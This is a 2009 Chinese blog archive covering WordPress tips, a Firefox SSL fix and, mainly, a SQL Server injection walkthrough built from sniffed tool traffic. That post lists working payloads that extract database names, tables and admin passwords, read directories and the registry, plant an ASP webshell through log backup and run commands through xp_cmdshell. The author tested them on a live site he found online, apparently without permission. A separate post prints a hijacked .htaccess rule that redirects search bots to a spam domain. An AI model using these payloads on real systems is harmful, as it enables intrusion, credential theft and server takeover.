2009年10月

用Google搜索替换WordPress默认的搜索

WordPress自带的搜索功能没有Google强大,所以想把博客的搜索功能替换成Google自定义搜索。翻了翻网上的资料,发现自定义搜索已经改版了,表面上看没有以前的功能强大,实则有被ajax google search api代替的趋势。

现在登录http://www.google.com/cse/?hl=zh-CN ,生成一个最简单的搜索框的代码如下:

<!-- Google Custom Search Element -->
<div id="cse" style="width:100%;">Loading</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script type="text/javascript">
google.load('search', '1');
google.setOnLoadCallback(function(){
new google.search.CustomSearchControl('003302537028975418586:ymvle_l4feq').draw('cse');
}, true);
</script>

搜索的结果是ajax无刷新取得的,但是,花了点时间读了google search api , 尝试在我的博客上使用。我用的主题是oriental,把搜索的结果用draw插入到id为contentinner的div中,但是样式完全惨目忍睹,暂时没有时间来分析原因,我猜想是因为oriental的css应用到了搜索结果上了。只有采用老方法。因为oriental的搜索框是在header.php中的,所以定位到header.php,把一下代码放在searchBar这个div中:

<div id="searchBar">
<form action="http://www.google.com/cse" id="cse-search-box">
<div>
<input type="hidden" name="cx" value="003302537028975418586:ymvle_l4feq" />
<input type="hidden" name="cof" value="FORID:11" />
<input type="hidden" name="ie" value="UTF-8" />
<input type="text" name="q" size="31" />
<input type="submit" name="sa" value="搜索" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=zh-Hans"></script>
</div>

cx是自定义搜索的唯一id,需要一个google账户,在http://www.google.com/cse/?hl=zh-CN中新建,然后自动分配,全世界唯一。

基本上就这样:

用google搜索替换wordpress默认的搜索

用google搜索替换wordpress默认的搜索

通过SniffX嗅探Domain3.5、NBSI3.0、啊D2.32、Pangolin全面了解SQLServer注入过程

想了解sql注入的过程和原理,网上找了些文章,讲得都比较肤浅,但是我知道有几款国内比较常用的注入工具,比如Domain3.5、NBSI3.0、啊D2.32、还有Pangolin、还有一些国外的。这里随便弄几个来研究一下就ok。这次用到的嗅探工具是sniffx专门嗅探http的数据包,功能不强大,但是足够这次活动的使用。本来想使用ethereal或wireshark,但是里面复制数据包内容老是把没有转码的16进制也复制了过来,有点麻烦。也就是说这两个工具用得不娴熟。

查询数据库信息

本地没有找到好点的有注入漏洞的系统,只好在网上寻找了,先用Domain3.5,运行很好以来就找到个sqlserver,sa权限的注入点,点Domain3.5上面的“开始检测”

通过SniffX嗅探Domain3.5、NBSI3.0、啊D2.32、Pangolin全面了解SQLServer注入过程

以下是Domain3.5中嗅探出来的http数据包:

news_show.asp?id=15618%20and%201=1  
news_show.asp?id=15618%20and%201=2
news_show.asp?id=15618%20and%20exists%20(select%20*%20from%20sysobjects)
news_show.asp?id=15618%20and%20char(124)%2Buser%2Bchar(124)=0
news_show.asp?id=15618;declare%20@a%20int--
news_show.asp?id=15618%20and%20char(124)%2Bdb_name()%2Bchar(124)=0
news_show.asp?id=15618%20And%20IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)=1

以下是NBSI3.0中嗅探出来的http数据包:

news_show.asp?id=15618%20and%20user%2Bchar(124)=0  
news_show.asp?id=15618%20And%20system_user%2Bchar(124)=0
news_show.asp?id=15618%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20nvarchar(1))%2Bchar(124)=1
news_show.asp?id=15618%20And%20db_name()%2Bchar(124)=0
news_show.asp?id=15618;declare%20@a%20int--

啊D和Pangolin的数据包这里就不列出来了,都差不多。基本的过程是通过and 1=1和and 1=2来判断是否可注入,一般1=1返回http 200(ok),1=2返回http 500(internal server error)表示injectable。然后and exists(select * from sysobjects)来判断数据库类型,sysobjects是sqlserver每个数据库自带的用来存储数据库信息的表格,access每个数据库自带的表格是msysobjects。判断出来是sqlserver数据库之后,然后用系统自带的变量user,system_user和0比较,system_user是nchar类型,user是char类型,0是肯定是int类型,因为不同类型的数据在sqlserver中无法直接比较,所以对于开启错误提示的sqlserver来说就会报错,顺便将敏感信息也暴了出来:

通过SniffX嗅探Domain3.5、NBSI3.0、啊D2.32、Pangolin全面了解SQLServer注入过程

关于user,system_user的解释,点上面的链接到msdn上去看看。
Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20nvarchar(1))%2Bchar(124)=1cast()作用是将一种数据类型的表达式显式转换为另一种数据类型的表达式。CAST 和 CONVERT 提供相似的功能。IS_SRVROLEMEMBER指示 SQL Server 2005 登录名是否为指定固定服务器角色的成员,返回值类型为int,0表示不是某某成员,1表示是。0x730079007300610064006D0069006E00是'sysadmin'的16进制码,为啥要弄成16进制呢,我猜想可能是怕网站程序过滤点sysadmin关键字,如果页面正常返回(200),则表示该用户是sysadmin。精心将int转换成nvarchar(1)又会暴出类型转换错误,而这就是黑客所需要的信息。db_name()回暴出当前数据库名。
;declare%20@a%20int--申明一个int变量a,作用我不得而知。接下来的工作是列出服务器上的数据库名:(假设服务器上有16个数据库)

news_show.asp?id=15618 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From master..sysdatabases)%3E0
news_show.asp?id=15618 And char(124)+(Select Top 1 cast([name] as varchar(8000)) from(Select Top 1 dbid,name from [master]..[sysdatabases] order by [dbid]) T order by [dbid] desc)>0
news_show.asp?id=15618 And char(124)+(Select Top 1 cast([name] as varchar(8000)) from(Select Top 2 dbid,name from [master]..[sysdatabases] order by [dbid]) T order by [dbid] desc)>0
news_show.asp?id=15618 And (Select Top 1 cast([name] as nvarchar(4000))%2Bchar(124) from(Select Top 16 dbid,name from **[master].[dbo].[sysdatabases]** order by [dbid]) T order by [dbid] desc)>0

先列出上面UrlEncode的字符

%2B -- '+'  
%3E -- '>'
%20 -- ' '
%2F -- '/'

我只能说这些sql语句构造得是相当的巧妙啊,我开始纳闷了,为啥非要用子查询呢。于是我直接用
Select Top X dbid,name from [master].[dbo].[sysdatabases] order by [dbid]
当X为1,也就是返回第一个的时候,是没有问题的,返回了master,但是X为2的时候就出现错误:
子查询返回的值多于一个。当子查询跟随在 =、!=、<、<=、>、>= 之后,或子查询用作表达式时,这种情况是不允许的。
这个时候子查询就起到了关键作用。还有开始不知道T是啥玩意,后来才知道sqlserver子查询必须要起一个别名,T就是那个别名,然后把查询的语句继续和0比较报错 这样就暴出了所有的数据库名。
第一个select count(1)返回数据库数量。

接下来是猜解表名,假设我们当前的数据库是news,那么首先猜解数据库的表的数量:

news_show.asp?id=15618 And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From news..sysobjects where xtype=0x55)>0

xtype的为数据表类型,0x55就是U,就是用户表。其他的参见这里有详细的解释。

然后分别列出表名:

news_show.asp?id=15618 And (Select Top 1 cast(name as nvarchar(4000)) from (Select Top 1 id,name from [news]..[sysobjects] Where xtype=0x55 order by id) T order by id desc)>0

修改第二个Top 1为1到表数就可以了。

然后是猜解列名,假设要猜解的表为Admin,首先得到表在sysobjects中存储的唯一id:

news_show.asp?id=15618 And (Select Top 1 cast(id as nvarchar(20)) from [news].[dbo].[sysobjects] where name='**Admin**')>0

猜解表名,id就是上面查询出来Admin表的id。

news_show.asp?id=15618 And (Select Top 1 cast(name as nvarchar(4000))+char(124) from (Select Top 1 colid,name From [news].[dbo].[syscolumns] Where id =** 1993058136** Order by colid) T Order by colid desc)>0

假设猜解出来的列名有id,AdminName,AdminPassword,AdminPower,Userid,ct
假设只猜解AdminName和AdminPassword的值
首先查看Admin表有多少条记录:

news_show.asp?id=15618 And (Select Cast(Count([AdminName]) as nvarchar(4000))+char(124) From [news]..[Admin] Where 1=1)>0

返回第一列数据:

news_show.asp?id=15618 And (Select Top 1 isNull(cast([AdminName] as nvarchar(4000)),char(32)) char(124) isNull(cast([AdminPassword] as nvarchar(4000)),char(32)) From (Select Top 1 [AdminName],[AdminPassword] From [news]..[Admin] Where 1=1 Order by [AdminName]) T Order by [AdminName] Desc)>0

isNull是判定数据是否为空,为空就返回后面那个char(32)的值也就是空格->‘ ’ 。
后面的以此类推。

读取目录----xp_dirtree

drop掉表,然后在当前数据库创建一个表,有三个字段subdirectory,depth,file

Board.asp?id=494;DROP TABLE techguru;CREATE TABLE techguru(subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)--

清空表的数据,然后把xp_dirtree存储过程的结果存入techguru表,xp_dirtree第一个参数是路径,第二个是深度,为0时无限递归,第三个是文件类型,1为文件夹和文件,0为只显示文件夹。

Board.asp?id=494;DELETE techguru;Insert techguru exec master..xp_dirtree 'c:\',1,1--

开始一个一个的抓取文件,目录名字,每次增加第二个top后面的数

Board.asp?id=494 And (Select Top 1 cast([subdirectory] as nvarchar(400))%2Bchar(124)%2Bcast([file] as nvarchar(1))%2Bchar(124) From(Select Top 1 [subdirectory],[file] From techguru ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)=0

移除表:

Board.asp?id=494;DROP TABLE techguru--

读取注册表----xp_regread

首先建立一个表,有两列Value和Data

Board.asp?id=494;DROP TABLE \[techguru];CREATE TABLE [techguru\](Value nvarchar(4000) NULL,Data nvarchar(4000) NULL)--

执行xp_regread写入刚建立的表

Board.asp?id=494;DELETE [techguru];Insert [techguru] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/'--

读出来

Board.asp?id=494 And (Select Top 1 cast([Data] as nvarchar(4000))%2Bchar(124) From [techguru] order by [Data] desc)=0

删表

Board.asp?id=494;DROP TABLE [techguru]--

上传webshell----backup log xx to disk

备份log,截断1,截断2
第 一 步:建立存一句话木马的表

Board.asp?id=494;create table \[dbo].[shit_tmp\] ([cmd] [image])--

第 二 步:0x7900690061006F006C007500是‘yiaolu’的sql编码

Board.asp?id=494;declare @a sysname,@s nvarchar(4000) select @a=db_name  
(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate--

第 三 步:0x3C25657865637574652872657175657374282261222929253E是< %execute(request("a"))%>的hex。

Board.asp?id=494;insert into \[shit_tmp\](cmd) values  
(0x3C25657865637574652872657175657374282261222929253E)--

第 四 步0x64003A005C003100320033002E00610073007000是d:\123.asp的sql编码

Board.asp?id=494;declare @a sysname,@s nvarchar(4000) select @a=db_name  
(),@s=0x64003A005C003100320033002E00610073007000 backup log @a to disk=@s with init,no_truncate--

第 五 步

Board.asp?id=494;Drop table [shit_tmp]--

执行命令

;CREATE TABLE \[X_2894\]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);  
insert into \[X_2894\](ResultTxt) exec master.dbo.xp_cmdshell 'Dir C:\';
insert into [X_2894] values ('g_over');exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt+char(124) End from (Select Top 1 id,ResultTxt from [X_2894] order by [id]) T order by [id] desc)>0

......

And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt+char(124) End from (Select Top 23 id,ResultTxt from [X_2894] order by [id]) T order by [id] desc)>0

g_over这个是专门插入用来作为命令回显结束的标志。

;DROP TABLE [X_2894];--

本地文件上传

假设上传到服务器c:\down.vbs位置

;exec master.dbo.xp_cmdshell 'del C:\down.vbs'--

;exec master.dbo.xp_cmdshell 'ecHo [DeleteOnCopy] >> C:\down.vbs';exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

;exec master.dbo.xp_cmdshell 'ecHo Owner=Administrator >> C:\down.vbs';exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

;exec master.dbo.xp_cmdshell 'ecHo Personalized=5 >> C:\down.vbs';exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

;exec master.dbo.xp_cmdshell 'ecHo PersonalizedName=My Documents >> C:\down.vbs';exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

总结来说就是调用xp_cmdshell执行echo 一句句的写入文件。

这次分析算是告一段落,不过还有mysql,access,oracle,db2,infomix..........等待探索。

哪个sb插件改了我的.htaccess

上次的wordpress故障在解决的同时发现了一个惊天的秘密,俺的web根目录下的.htaccess被修改。

被修改成这样:

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://doormoney.us/ [R=301,L]

难怪google仅仅收录了本站4页,原来google,yahoo,msn的机器人都被301带到了一个叫doormoney.us的网站,估计是哪个sb插件修改的,要么就是被黑了?貌似是个白俄罗斯的网站。啥内容也没有。

删掉# BEGIN WordPress和# END WordPress之间以外所有内容,现在爬虫又开始在我的网站上抓取了。我艹,速度还真快啊,昨天晚上收录才4个,今天就23了。看来bot们被这该死的.htaccess规则给憋坏了。

故障:wordpress后台数据全部为空

故障:wordpress后台数据全部为空

事情大概发生在2009/10/12,昨天进了本站后台发现全部内容归0,如上图所示。把我吓了一跳。前台的东西完全可以正常访问。我比较怀疑是数据库的问题。试着自己解决,恢复数据到10月7号,问题照旧。本来还打算叫空间的管理员恢复全部内容到10.7,在恢复前的1分钟,它自己又正常了:

故障:wordpress后台数据全部为空

过了一会又“归0”了,相当的邪门 。

到wordpress.org.cn上发帖求助发现没有鸟我,鸟我的也说没有出现过这种情况,然后到wordpress官方论坛发贴,有人解答,方法是删除.htaccess,重新在permalink中自动生成,或者修复mysql所有表。但是貌似都不管用。

无奈之下求教了空间管理员-“黑山老妖”,把后台的密码给了他,结果他禁用了插件akismet一些恢复如初。后台的速度也比以前快了,看来akismet确实是罪魁祸首啊。我对黑山老妖表示万分的感谢,同时我也十分的纳闷akismet插件和这个概况的显示有好大的关系,具体的代码我就不深究了。总之,这确实很邪门。

解决Firefox连接example.com:443时发生错误。 由于SSL协议被禁用,无法安全的连接。 (错误码: ssl_error_ssl_disabled)

打开firefox出现警告框,然后https协议的网站都打不开,错误提示:“连接example.com:443时发生错误。 由于SSL协议被禁用,无法安全的连接。 (错误码: ssl_error_ssl_disabled)”
出现问题的可能有:

硬盘空间不足

查看自己的硬盘分区,看有没有快空间耗尽的,有就清理下。

文件权限不够

检查profile目录下面cert8.db是否为只读,请务必不要勾选只读选项。我的系统现在是windows 7,profile目录是C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\b05uoda1.default

文件损坏

cert8.db文件可能因为系统原因而损坏,关闭firefox,删除cert8.db,然后启动firefox。

以下听说是cert8d.db损坏的原因:

Non-Latin characters in username

There seems to be a bug with non-Latin (For example Chinese or Russian) characters in your username. There's no fix yet but a workaround is to make another account with a Latin characters only username.

via,
刚才好像是灵魂出窍了,blogspot可直接访问。